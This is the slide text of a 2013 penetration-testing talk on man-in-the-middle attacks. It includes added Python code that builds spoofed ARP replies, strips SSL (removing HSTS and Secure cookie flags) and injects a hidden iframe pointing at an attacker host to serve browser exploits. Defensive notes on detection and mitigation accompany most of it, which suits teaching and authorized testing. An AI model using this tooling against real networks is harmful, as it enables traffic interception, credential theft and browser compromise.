Offensive Man-in-the-Middle
Navaja Negra - Albacete
Octubre 2013
$ whois jselvi
Jose Selvi
10 years working in Security
Senior Penetration Tester at
SANS Institute Community Instructor
GIAC Security Expert (GSE)
Twitter: @JoseSelvi
Blog: http://www.pentester.es
Disclaimer!
No user was
(very) harmed
in the making
of this speech
Let’s Go!
Man-in-the-Middle 101
The Passive approach
Downgrade Attacks
SSL Bypass
On-the-fly content injection
Tricking users
Browser exploitation
Man-in-the-Middle
ARP Spoofing
Victim: "WHO'S THE ROUTER?"
Attacker: "I'M THE ROUTER!" (the attacker answers ARP requests for the gateway with its own MAC, so the victim's traffic to the gateway is delivered to the attacker)

DHCP Spoofing
Victim: "I WANT AN IP"
Attacker: "YOUR IP IS..." (a rogue DHCP server hands out a lease whose default gateway and DNS server point at the attacker)

ICMP Redirect
Attacker: "A NEW ROUTE FOR YOU" (a forged ICMP redirect tells the victim to send traffic for a destination through the attacker instead of the real gateway)
Much more...
DNS Spoofing
Port Stealing
STP Mangling
Route Mangling
...

Even Social Engineering...
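Added example, not code from the talk and not any of the tools it mentions: the "I'M THE ROUTER!" frame from the ARP Spoofing slide built by hand with struct, parsed back, and the check a defender would run over the same frames, which is flagging a sender IP that is claimed by more than one MAC (the "flip-flop" that arpwatch reports). All addresses are constructed. Actually putting the frame on the wire needs a raw AF_PACKET socket and root, and is left out.

```python
import socket
import struct
from collections import defaultdict

ETH_TYPE_ARP = 0x0806
ARP_REQUEST, ARP_REPLY = 1, 2

# Constructed addresses for the demo (not from the talk)
ROUTER_MAC = "00:11:22:33:44:55"
ATTACKER_MAC = "de:ad:be:ef:00:01"
VICTIM_MAC = "66:77:88:99:aa:bb"
GATEWAY_IP, VICTIM_IP = "192.168.1.1", "192.168.1.50"


def mac_bytes(mac):
    """'aa:bb:cc:dd:ee:ff' -> 6 raw bytes."""
    return bytes.fromhex(mac.replace(":", ""))


def mac_str(raw):
    return ":".join("%02x" % b for b in raw)


def build_arp(oper, sender_mac, sender_ip, target_mac, target_ip):
    """Ethernet frame carrying an ARP packet (RFC 826 layout, 42 bytes)."""
    eth = struct.pack("!6s6sH", mac_bytes(target_mac), mac_bytes(sender_mac), ETH_TYPE_ARP)
    arp = struct.pack("!HHBBH6s4s6s4s",
                      1, 0x0800, 6, 4, oper,      # Ethernet / IPv4 / hlen / plen / operation
                      mac_bytes(sender_mac), socket.inet_aton(sender_ip),
                      mac_bytes(target_mac), socket.inet_aton(target_ip))
    return eth + arp


def spoofed_gateway_reply(attacker_mac, gateway_ip, victim_mac, victim_ip):
    """The "I'M THE ROUTER!" frame: an unsolicited ARP reply that binds the
    gateway IP to the attacker's MAC in the victim's ARP cache."""
    return build_arp(ARP_REPLY, attacker_mac, gateway_ip, victim_mac, victim_ip)


def parse_arp(frame):
    """ARP fields of a frame, or None if it is not an Ethernet/IPv4 ARP packet."""
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETH_TYPE_ARP:
        return None
    htype, ptype, hlen, plen, oper, sha, spa, tha, tpa = struct.unpack("!HHBBH6s4s6s4s", frame[14:42])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        return None
    return {"oper": oper,
            "sender_mac": mac_str(sha), "sender_ip": socket.inet_ntoa(spa),
            "target_mac": mac_str(tha), "target_ip": socket.inet_ntoa(tpa)}


def find_arp_conflicts(frames):
    """Detection side (what arpwatch calls a flip-flop): every ARP packet, request
    or reply, asserts a sender IP->MAC binding; an IP claimed by more than one
    MAC is either a legitimate hardware change or someone answering
    "I'M THE ROUTER!" in the gateway's name."""
    claims = defaultdict(set)
    for frame in frames:
        pkt = parse_arp(frame)
        if pkt is not None:
            claims[pkt["sender_ip"]].add(pkt["sender_mac"])
    return {ip: macs for ip, macs in claims.items() if len(macs) > 1}


if __name__ == "__main__":
    legit = build_arp(ARP_REPLY, ROUTER_MAC, GATEWAY_IP, VICTIM_MAC, VICTIM_IP)
    spoof = spoofed_gateway_reply(ATTACKER_MAC, GATEWAY_IP, VICTIM_MAC, VICTIM_IP)
    print(parse_arp(spoof))
    print(find_arp_conflicts([legit, spoof]))
```

The same conflict check is the one to keep running on a monitoring port after the engagement: static ARP entries for the gateway, or dynamic ARP inspection on the switch, are what stop the attack, but the flip-flop is what tells you it happened.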
The Passive approach
Just Sniffing...
Automated Analysis
Password Capture
Downgrade Attacks
Protocol Negotiation
(diagram: client and server exchange the protocol versions they support before settling on one)
Downgrade Attack
(cartoon captions, translated from Spanish)
"And the woman says 'a relaxing cup of café con leche'..."
"Hush, hush... I've lent them money..."
The SSHv1 Example
Server: "I can speak v1 & v2" (an SSH-1.99 banner)
Attacker, relaying to the client: "I can speak just v1"
Client: "OK, let's talk SSHv1"
Result: client and server now talk SSHv1 through the attacker.
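Added example, not code from the talk: a model of the SSH identification-string exchange behind the SSHv1 slide, with both sides' messages. The rewrite of an SSH-1.99 banner (server speaks v1 and v2) into SSH-1.5 (v1 only) is the assumed attacker action for this example; the banner strings are constructed. The point a practitioner wants is the last case: a client that only accepts protocol 2 refuses the connection instead of downgrading, so the downgrade only works against clients that still allow v1.

```python
import re

BANNER_RE = re.compile(rb"^SSH-(\d+\.\d+)-(\S+)")


def parse_banner(line):
    """(protoversion, softwareversion) from an SSH identification string
    such as b'SSH-1.99-OpenSSH_5.3\\r\\n' (RFC 4253 section 4.2 format)."""
    m = BANNER_RE.match(line)
    if not m:
        raise ValueError("not an SSH identification string: %r" % line)
    return m.group(1).decode(), m.group(2).decode()


def offered_versions(protoversion):
    """Major protocol versions a banner advertises; '1.99' is the legacy way
    of saying 'both 1 and 2'."""
    if protoversion == "1.99":
        return {1, 2}
    return {int(protoversion.split(".")[0])}


def client_choice(client_versions, server_banner):
    """Client side of the negotiation: the highest major version both sides
    support, or None when the client must refuse the connection."""
    proto, _ = parse_banner(server_banner)
    common = set(client_versions) & offered_versions(proto)
    return max(common) if common else None


def mitm_downgrade(server_banner):
    """What the attacker does to the banner on its way to the client (the
    rewrite assumed for this example): 'SSH-1.99-*' becomes 'SSH-1.5-*', so
    the client only ever hears 'I can speak just v1'. Other banners pass."""
    proto, software = parse_banner(server_banner)
    if proto == "1.99":
        return b"SSH-1.5-" + software.encode() + b"\r\n"
    return server_banner


if __name__ == "__main__":
    server = b"SSH-1.99-OpenSSH_5.3\r\n"          # constructed banner
    print("direct:", client_choice([2, 1], server))                           # 2
    print("via MitM:", client_choice([2, 1], mitm_downgrade(server)))         # 1
    print("v2-only client via MitM:", client_choice([2], mitm_downgrade(server)))  # None
```

The fix is on both ends: the server stops advertising 1.99 (protocol 2 only, so there is nothing to strip), and the client is configured to accept protocol 2 only, so a stripped banner is a refused connection rather than a weaker session.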
SSL Bypass
Self-Signed Certificate
Client <--HTTPS--> Attacker <--HTTPS--> Server
(the attacker terminates the client's TLS session with its own self-signed certificate and opens a second HTTPS session to the real server; the client sees a certificate warning, so this only works if the user clicks through it)
SSL Strip
http://www.thoughtcrime.org/software/sslstrip/
By Moxie Marlinspike
Transparent proxy
HTTP to HTTPS gateway
sed 's/https/http/g'
Usually it all starts with an HTTP connection
SSL Strip
Client --HTTP--> Attacker --HTTPS--> Server
Client: GET / HTTP/1.1
Response as the attacker forwards it to the client:
<body>
<img src=whatever.jpg>
<a href=https://myweb/login>  becomes  <a href=http://myweb/login>
</body>
DEMO
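Added example, not sslstrip's own code: the client-facing half of a stripping proxy, which is the `sed 's/https/http/g'` step from the slide plus the two things the slide leaves implicit, namely remembering which links were downgraded so the victim's later http:// requests are fetched from the server over https://, and removing the response headers that would pull the browser back onto TLS on their own (HSTS, https Location redirects, the Secure cookie flag). Bodies, headers and hosts are constructed.

```python
import re
from urllib.parse import urlsplit, urlunsplit

HTTPS_LINK = re.compile(rb"https://([^\s\"'<>]+)")


class Stripper:
    """Client-facing half of an sslstrip-style proxy: the victim talks plain
    HTTP to us, we talk HTTPS to the server, and we remember which links we
    downgraded so the victim's later http:// requests go back out as https://."""

    def __init__(self):
        self.stripped = set()       # "host/path" strings we have rewritten

    def rewrite_body(self, body):
        """The sed 's/https/http/g' step, with bookkeeping."""
        def swap(m):
            self.stripped.add(m.group(1).decode())
            return b"http://" + m.group(1)
        return HTTPS_LINK.sub(swap, body)

    def rewrite_headers(self, headers):
        """Headers that would bring the browser back onto TLS by themselves."""
        out = []
        for name, value in headers:
            lname = name.lower()
            if lname == "strict-transport-security":
                continue                       # HSTS must never reach the victim
            if lname == "location" and value.startswith("https://"):
                self.stripped.add(value[len("https://"):])
                value = "http://" + value[len("https://"):]
            if lname == "set-cookie":
                # a Secure cookie would never be sent over the stripped HTTP session
                value = re.sub(r";\s*secure", "", value, flags=re.I)
            out.append((name, value))
        return out

    def upstream_url(self, client_url):
        """Map the victim's http:// request to the URL we fetch from the server."""
        p = urlsplit(client_url)
        key = p.netloc + p.path
        if p.scheme == "http" and any(key.startswith(s) for s in self.stripped):
            return urlunsplit(("https",) + tuple(p[1:]))
        return client_url


if __name__ == "__main__":
    s = Stripper()
    page = b'<body><img src=whatever.jpg><a href=https://myweb/login>Login</a></body>'
    print(s.rewrite_body(page))
    print(s.upstream_url("http://myweb/login"))
```

The caveat that matters in 2013 and later: the HSTS header can be stripped, but a browser that already has the policy cached, or that ships the site in its preload list, rewrites http:// to https:// before anything reaches the wire, so the first plain-HTTP connection the attack depends on never happens.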
SSL Vulnerabilities
BEAST / CRIME
By Juliano Rizzo, Thai Duong
BREACH
By Angelo Prado, Neal Harris, Yoel Gluck
CRIME and BREACH are based on compression characteristics before encryption (TLS-level compression and HTTP response compression respectively); BEAST exploits the predictable CBC initialisation vectors of TLS 1.0.
Chosen-plaintext attacks: the attacker sits in the middle watching the encrypted traffic and makes the victim's browser send requests that contain attacker-chosen data.
They can decrypt secrets (cookies, CSRF tokens, etc.).
On-the-fly content injection
Spanish model
(diagram: Corp. A, Corp. B, Corp. C, Corp. D)
The “K” Factor
<body>
<img src=whatever.jpg>
<iframe src=http://hacker/>
</body>
The Middler
https://code.google.com/p/middler/
By InGuardians
Transparent HTTP & SIP Proxy
Plugin based: easy & powerful
IFrame injection
Last release from July 2009
Some fixes are needed... but that is why Python r00l3z :)
The Middler Plugins
Burp Suite / The Middler
Client --HTTP--> Attacker --HTTP--> Server
Client: GET / HTTP/1.1
Response as the attacker forwards it to the client:
<body>
<img src=whatever.jpg>
<iframe src=http://hacker/>
</body>
Burp Suite
http://portswigger.net/burp/
By PortSwigger
General interception proxy
Supports transparent proxying
Supports match/replace
Best option if you have the Pro version
If not... you will lose your configuration when closing
DEMO
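Added example, neither a Middler plugin nor Burp's match/replace: the response rewrite that an iframe-injection proxy has to get right for the injected page to render at all. Matching `</body>` is the easy part; the parts that break in practice are touching only text/html, undoing gzip before editing, and fixing Content-Length (and dropping Content-Encoding) afterwards, otherwise the browser truncates or refuses the page. Responses and the iframe URL are constructed; chunked responses are passed through untouched because de-chunking is out of scope here.

```python
import gzip


def make_response(body, content_type=b"text/html", gzipped=False, extra_headers=()):
    """Constructed HTTP/1.1 response for the demo (not a real server's output)."""
    if gzipped:
        body = gzip.compress(body)
    headers = [b"HTTP/1.1 200 OK", b"Content-Type: " + content_type]
    if gzipped:
        headers.append(b"Content-Encoding: gzip")
    headers.extend(extra_headers)
    headers.append(b"Content-Length: " + str(len(body)).encode())
    return b"\r\n".join(headers) + b"\r\n\r\n" + body


def inject_iframe(raw_response, iframe_url):
    """Rewrite one complete HTTP/1.x response so the page also loads iframe_url.
    Only text/html bodies are touched; anything else comes back byte for byte."""
    head, sep, body = raw_response.partition(b"\r\n\r\n")
    if not sep:
        return raw_response
    lines = head.split(b"\r\n")
    status_line, headers = lines[0], []
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers.append((name.strip(), value.strip()))

    def header(name):
        for n, v in headers:
            if n.lower() == name:
                return v.lower()
        return b""

    if not header(b"content-type").startswith(b"text/html"):
        return raw_response
    if header(b"transfer-encoding") == b"chunked":
        return raw_response        # a real proxy must de-chunk first; out of scope here
    encoding = header(b"content-encoding")
    if encoding == b"gzip":
        body = gzip.decompress(body)
    elif encoding:
        return raw_response        # deflate, br, ...: not handled, pass through untouched

    payload = (b'<iframe src="' + iframe_url +
               b'" width="0" height="0" style="display:none"></iframe>')
    idx = body.lower().rfind(b"</body>")
    if idx == -1:
        body = body + payload
    else:
        body = body[:idx] + payload + body[idx:]

    # The body changed, so the framing headers must change with it: new length,
    # and no Content-Encoding since we now send the plain bytes.
    headers = [(n, v) for n, v in headers
               if n.lower() not in (b"content-length", b"content-encoding")]
    headers.append((b"Content-Length", str(len(body)).encode()))
    head = b"\r\n".join([status_line] + [n + b": " + v for n, v in headers])
    return head + b"\r\n\r\n" + body


if __name__ == "__main__":
    page = b"<html><body><img src=whatever.jpg></body></html>"
    print(inject_iframe(make_response(page), b"http://hacker/").decode())
```

Burp's match/replace on response bodies does the same `</body>` substitution; Burp handles the decompression and Content-Length bookkeeping for you, which is exactly what a hand-written Middler plugin has to do itself.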
Tricking users
BeEF & Metasploit
BeEF: Browser Exploitation Framework
http://beefproject.com/

Metasploit Framework
http://www.metasploit.com/
BeEF & MSF
(diagram: the VICTIM browses GOOGLE through the attacker, who injects <iframe src=http://attacker/demo> into the page; the iframe content is served by BeEF and MSF)
What to do
Fingerprinting
Redirect to another page
Capture NTLM
SMB Relay Attacks
Credential Theft
Request software installation
DEMO
Browser exploitation
Browser Vulnerabilities 2012
Internet Explorer: 34
Mozilla Firefox: 99
Google Chrome: 68
Java Plugin: 32
Adobe Flash: 61
Adobe Reader: 25
Source: http://www.gfi.com/blog/wp-content/uploads/2013/02/Most-TargetedApplications-in-2012.jpg
Metasploit Exploitation
(diagram: the same injection, the VICTIM browsing GOOGLE gets <iframe src=http://attacker/demo>, but now the iframe is served by MSF, which exploits the victim's browser)
DEMO
Thanks! Questions?
Jose Selvi
http://twitter.com/JoseSelvi
jselvi@s21sec.com
http://www.s21sec.com

jselvi@pentester.es
http://www.pentester.es